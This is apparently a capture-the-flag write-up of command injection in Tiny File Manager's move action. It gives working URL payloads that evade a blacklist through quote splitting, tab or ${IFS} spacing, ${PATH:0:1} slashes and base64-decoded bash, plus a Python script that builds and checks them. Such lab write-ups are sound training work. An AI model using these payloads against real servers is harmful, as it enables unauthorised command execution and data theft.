# Initial Enum

- `ping` test ![[images/Pasted image 20260106192041.png]]
- `nmap` scan ![[images/Pasted image 20260106192048.png]]
- visit page ![[images/Pasted image 20260106191947.png]]
- HTTP GET request ![[images/Pasted image 20260106192012.png]]
- source code re: fields - I don't see any front-end validation ![[images/Pasted image 20260106192151.png]]

# test

- user `test` for username and password - we have an error message ![[images/Pasted image 20260106192258.png]]
- also shown in GET request ![[images/Pasted image 20260106192358.png]]
- note that a cookie is being used
- we also have a POST request with the cookie ![[images/Pasted image 20260106192432.png]]

# OSINT

- Do some googling on `tiny file manager`
- here is the description on Github ![[images/Pasted image 20260106192853.png]]
- Default username noted ![[images/Pasted image 20260106192917.png]]
- Neither of the defaults worked ![[images/Pasted image 20260106193015.png]] ![[images/Pasted image 20260106193023.png]]
- Github shows the `tinyfilemanager.php` file - password hashes are leveraged ![[images/Pasted image 20260106193533.png]]

# use provided credentials

- visit page ![[images/Pasted image 20260106194441.png]]
- source code re: new file creation ![[images/Pasted image 20260106194618.png]]

# let's try to go back to initial login and inject a command

## test injection operations

- `;` - failure with both username and password - NOTE: character being URL encoded
- `|` - failure with both username and password
- `&` - failure with both username and password
- `||` - failure with both username and password
- `&&`

## hint indicates that it's easier to inject a command at the end instead of the middle

- focus on password field
- rerun URL-encoded injection operators with `id` - all failures

# go back to page after login

- turn off burp proxy to see page properly ![[images/Pasted image 20260106201313.png]]
- try copy action ![[images/Pasted image 20260106201337.png]]
- try to select `/tmp` - NOTE: URL changed ![[images/Pasted image 20260106201400.png]]
- select copy ![[images/Pasted image 20260106201422.png]]
- visit `/tmp` ![[images/Pasted image 20260106201501.png]]
- try move action - works with `tmp` selected ![[images/Pasted image 20260106201738.png]]
- try without `tmp` selected; we get the following error message ![[images/Pasted image 20260106201717.png]]
- Send the above error to repeater and note the error line location in the response - line 733 ![[images/Pasted image 20260106202034.png]]
- NOTE: The backend is most likely building a `mv` command from the request parameters, and if the command fails, it prints the error into the response; therefore, this may be abused to capture command output, since anything the shell writes to stderr lands in the same place in the page

# Determine injection point

- try to inject a test command such as `whoami` or `id` in conjunction with the `&` in the default URL ![[images/Pasted image 20260106203502.png]]
- test at first `&` - we are getting a file-related error and not an invalid-command error ![[images/Pasted image 20260106203655.png]]

```bash
/index.php?to=&whoami&from=51459716.txt&finish=1&move=1
```

- NOTE: a raw `&` in the query string is a parameter separator, so in the request above `whoami` arrives as its own (empty) parameter and `to` stays empty; `mv` then complains about the file rather than the shell complaining about an unknown command. To get `&` into the value of `to` it has to be sent as `%26`, which is what the payloads below do

# Successful command injection

- single quotes don't work with `cat` but double quotes do against the command blacklist filter: the shell removes the quotes before execution, so `c"a"t` runs as `cat` while the filter never sees the literal string `cat`
- `%09` (tab) is accepted by the shell as a word separator in place of the filtered space; it can also be replaced with `${IFS}`, which unquoted expands to the shell's whitespace characters and word-splits the same way
- `${PATH:0:1}` is substring expansion (bash/ksh/zsh, not POSIX `sh`) and yields `/` as long as `PATH` starts with an absolute path, so the slash never has to appear literally

```bash
/index.php?to=tmp%09%26c"a"t%09${PATH:0:1}flag.txt&from=51459716.txt&finish=1&move=1
```

- we can also use base64 encoding for the `cat /flag.txt` command portion, so the filter sees neither `cat` nor a space: `base64 -d` decodes it from a here-string and `bash <<<` runs the decoded text
- base64 encode command ![[images/Pasted image 20260106204618.png]]
- use below payload

```bash
/index.php?to=tmp%09%26bash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)&from=51459716.txt&finish=1&move=1
```

![[images/Pasted image 20260106205253.png]]
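The payload construction from the notes above, as an added example that is my own code, not the write-up's and not Tiny File Manager's. It percent-encodes only the characters that would otherwise break the query string (which is how `&` becomes `%26` and tab becomes `%09`), wraps a command in the base64 here-string trick, checks each fragment against a blacklist I modelled as an assumption (the target's real filter is not on the page), and runs each fragment through bash's own parser to show what `c"a"t`, `${IFS}` and `${PATH:0:1}` expand to. It assumes `bash` is installed under `/usr/bin` or `/bin`; `51459716.txt` is the file name from the notes.

```python
"""Tiny File Manager move-action payload builder and bypass checker (added example)."""
import base64
import re
import subprocess
from urllib.parse import quote

FROM_FILE = "51459716.txt"  # file name used in the notes' URLs

# Characters that may stay raw in the query value: they matter to the shell but
# not to the query-string parser.  Everything else (&, tab, space, +, #, %) is
# percent-encoded, which is why the notes send & as %26 and tab as %09.
SHELL_SAFE = '"$(){}<>/:='

# Modelled blacklist (assumption, not the target's real filter): the literal
# word "cat", the space, and the separators that failed in the notes.
BLACKLIST = ("cat", " ", ";", "|")


def to_query_value(injected: str) -> str:
    """Encode an injected shell fragment so it survives as one query parameter."""
    return quote(injected, safe=SHELL_SAFE)


def move_url(to_value: str, from_file: str = FROM_FILE) -> str:
    """The vulnerable move request with an attacker-controlled `to` parameter."""
    return f"/index.php?to={to_query_value(to_value)}&from={from_file}&finish=1&move=1"


def b64_wrap(cmd: str) -> str:
    """Hide a blacklisted command behind base64; bash decodes and runs it via here-strings."""
    enc = base64.b64encode(cmd.encode()).decode()
    return f"bash<<<$(base64\t-d<<<{enc})"


def passes_filter(fragment: str) -> bool:
    """True when the fragment contains none of the modelled blacklist strings."""
    return not any(bad in fragment for bad in BLACKLIST)


def shell_sees(fragment: str) -> list[str]:
    """Expand `fragment` exactly as bash would and return the resulting argv words.

    printf prints one argument per line, so quote removal (c"a"t -> cat),
    ${IFS} word splitting and ${PATH:0:1} substring expansion all become visible.
    PATH is pinned so ${PATH:0:1} is deterministically "/" and bash is found.
    """
    script = "printf '%s\\n' " + fragment
    out = subprocess.run(["bash", "-c", script], capture_output=True, text=True,
                         env={"PATH": "/usr/bin:/bin"}, check=True).stdout
    return out.splitlines()


def classify(body: str) -> str:
    """Sort a response the way the notes do: an mv error means the injected text
    reached mv as a path; a shell 'not found' error means the separator was honoured."""
    if re.search(r"\b(command not found|not found)\b", body):
        return "invalid command"
    if re.search(r"\bmv: ", body):
        return "file error"
    return "no error"


if __name__ == "__main__":
    for frag in ['cat /flag.txt',
                 'c"a"t\t${PATH:0:1}flag.txt',
                 'c"a"t${IFS}${PATH:0:1}flag.txt',
                 b64_wrap("cat /flag.txt")]:
        print(passes_filter(frag), shell_sees(frag) if passes_filter(frag) else "-",
              move_url("tmp\t&" + frag))
```

Run it and the first fragment is rejected by the filter while the other three pass; each passing one expands to `['cat', '/flag.txt']` (the base64 one expands to its own `bash`/`base64` words and only reveals `cat /flag.txt` once executed), and the printed URLs match the two payloads in the notes character for character.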